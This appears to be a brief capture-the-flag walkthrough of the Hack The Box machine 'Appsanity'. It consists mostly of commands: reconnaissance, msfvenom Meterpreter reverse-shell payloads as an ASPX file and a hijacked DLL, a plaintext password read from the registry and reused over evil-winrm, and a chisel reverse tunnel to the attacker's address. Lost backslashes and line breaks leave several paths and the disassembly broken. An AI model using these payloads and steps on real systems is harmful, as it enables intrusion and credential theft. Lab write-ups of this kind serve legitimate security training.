HTB-Appsanity笔记

nmap -sC -sV -sT -T4 -Pn 10.10.11.238

wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u "https://meddigi.htb/" -H "Host: FUZZ.meddigi.htb" --hc 404

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=tun0 LPORT=443 -f aspx -o cxk.aspx

reg query HKLMSoftwareMedDigi
meterpreter > shellProcess 1968 created.Channel 1 created.Microsoft Windows [Version 10.0.19045.3570](c) Microsoft Corporation. All rights reserved.
c:windowssystem32inetsrv>reg query HKLMSoftwareMedDigireg query HKLMSoftwareMedDigi
HKEY_LOCAL_MACHINESoftwareMedDigi    EncKey    REG_SZ    1g0tTh3R3m3dy!!

c:windowssystem32inetsrv>

evil-winrm -i 10.10.11.238 -u devdoc -p '1g0tTh3R3m3dy!!'

0x1400139fd      add     byte [rax], al0x1400139ff      add     byte [rcx + 0x76], al;-- str.Available_Commands:_backup:_Perform_a_backup_operation._validate:_Validates_if_any_report_has_been_altered_since_the_last_backup._recover__filename_:_Restores_a_specified_file_from_the_backup_to_the_Reports_folder._upload__external_source_:_Uploads_the_reports_to_the_specified_external_source.:0x140013a00          .string "Available Commands:nbackup: Perform a backup operation.nvalidate: Validates if any report has been altered since the last backup.nrecover <filename>: Restores a specified file from the backup to the Reports folder.nupload <external source>: Uploads the reports to the specified external source.n" ; len=296;-- str.backup:0x140013b28          .string "backup" ; len=70x140013b2f      add     byte [rdx + 0x61], al;-- str.Backup_operation_completed_successfully.:0x140013b30          .string "Backup operation completed successfully.n" ; len=420x140013b5a      add     byte [rax], al0x140013b5c      add     byte [rax], al0x140013b5e      add     byte [rax], al;-- str.An_error_occurred_during_the_backup_operation.:0x140013b60          .string "An error occurred during the backup operation.n" ; len=48;-- str.upload:0x140013b90          .string "upload" ; len=70x140013b97      add     byte [rax], ah0x140013b99      add     byte [rax], al0x140013b9b      add     byte [rax], al0x140013b9d      add     byte [rax], al0x140013b9f      add     byte [rcx + 0x6e], cl;-- str.Invalid_command._Missing_parameter_after__upload_._Type__help__for_available_commands.:0x140013ba0          .string "Invalid command. Missing parameter after 'upload'. Type 'help' for available commands.n" ; len=880x140013bf8      and     eax, 0x73 ; reloc.WS2_32.dll_WSAStartup0x140013bfd      add     byte [rax], al0x140013bff      add     byte [rbx + 0x3a], al;-- str.C:_Program_Files_ReportManagement_Libraries:0x140013c00          .string "C:Program FilesReportManagementLibraries" ; len=44;-- str..dll:0x140013c2c          .string ".dll" ; len=50x140013c31      add     byte [rax], al0x140013c33      add     byte [rax], al0x140013c35      add     byte [rax], al0x140013c37      add     byte [rbp + 0x78], ah;-- str.C:_Program_Files_ReportManagement_Libraries:0x140013c00          .string "C:Program FilesReportManagementLibraries" ; len=44;-- str..dll:0x140013c2c          .string ".dll" ; len=50x140013c31      add     byte [rax], al0x140013c33      add     byte [rax], al0x140013c35      add     byte [rax], al0x140013c37      add     byte [rbp + 0x78], ah;-- str.externalupload:0x140013c38          .string "externalupload" ; len=150x140013c47      add     byte [rsi + 0x61], al;-- str.Failed_to_upload_to_external_source.:0x140013c48          .string "Failed to upload to external source.n" ; len=380x140013c6e      add     byte [rax], al0x140013c70      invalid0x140013c71      add     byte [rbx], ah0x140013c74      add     byte [rax], al0x140013c76      add     byte [rax], al;-- str.ReportManagementHelper:0x140013c78          .string " ReportManagementHelper" ; len=48;-- str.Libraries:0x140013ca8          .string " Libraries" ; len=24;-- str.c:_Windows_System32_cmd.exe:

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=tun0 LPORT=443 -f dll -o externalupload.dllchisel server --port 8888 --reverse./chisel.exe client 10.10.14.107:8888 R:100:127.0.0.1:100